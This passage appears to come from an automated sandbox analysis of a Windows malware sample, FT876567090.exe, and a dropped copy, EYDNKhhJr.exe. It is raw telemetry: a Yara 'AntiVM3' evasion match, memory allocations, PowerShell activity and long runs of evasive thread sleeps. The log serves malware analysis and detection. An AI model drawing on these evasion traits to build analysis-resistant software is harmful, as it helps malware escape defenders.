Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: FT876567090.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EYDNKhhJr.exe PID: 4176, type: MEMORYSTR

Source: C:\Users\user\Desktop\FT876567090.exe	Memory allocated: 2810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Memory allocated: 29C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Memory allocated: 2810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Memory allocated: 7760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Memory allocated: 8760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Memory allocated: 8910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Memory allocated: 9910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Memory allocated: A340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Memory allocated: B340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Memory allocated: C340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Memory allocated: 2C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Memory allocated: 3020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Memory allocated: 2C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Memory allocated: 2AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Memory allocated: 2C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Memory allocated: 4C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Memory allocated: 7560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Memory allocated: 8560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Memory allocated: 8700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Memory allocated: 9700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Memory allocated: A120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Memory allocated: B120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Memory allocated: 30D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Memory allocated: 33A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Memory allocated: 31B0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599867	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599749	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599640	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599530	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599421	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599311	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599079	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598829	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596873	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596287	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595466	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595137	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595032	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 594313	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 594201	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599319
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599093
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598905
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598796
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598578
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598468
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598214
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597999
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597888
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597765
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597547
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597289
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597172
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596505
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596375
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596156
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596047
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595937
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595817
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595687
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595578
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595468
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595250
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595030
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 594922
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 594812
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 594703
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 594593
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 594484
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 594375

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7680	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1041	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7685	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 773	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Window / User API: threadDelayed 3478	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Window / User API: threadDelayed 6351	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Window / User API: threadDelayed 2203
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Window / User API: threadDelayed 7654

Source: C:\Users\user\Desktop\FT876567090.exe TID: 7428	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep count: 7680 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7996	Thread sleep count: 1041 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8176	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8084	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8184	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7764	Thread sleep count: 3478 > 30	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -599867s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7764	Thread sleep count: 6351 > 30	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -599749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -599640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -599530s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -599421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -599311s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -599079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -598829s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -598704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -598579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -598454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -598329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -598204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -598079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -597954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -597829s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -596873s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -596766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -596287s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -596063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -595466s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -595137s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -595032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -594813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -594688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -594563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -594438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -594313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe TID: 7776	Thread sleep time: -594201s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 3048	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7944	Thread sleep count: 2203 > 30
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7944	Thread sleep count: 7654 > 30
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -599319s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -599203s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -599093s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -598905s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -598796s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -598687s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -598578s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -598468s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -598359s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -598214s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -598109s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -597999s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -597888s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -597765s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -597656s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -597547s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -597437s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -597289s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -597172s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -597062s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -596953s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -596843s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -596734s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -596625s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -596505s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -596375s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -596265s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -596156s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -596047s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -595937s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -595817s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -595687s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -595578s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -595468s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -595359s >= -30000s
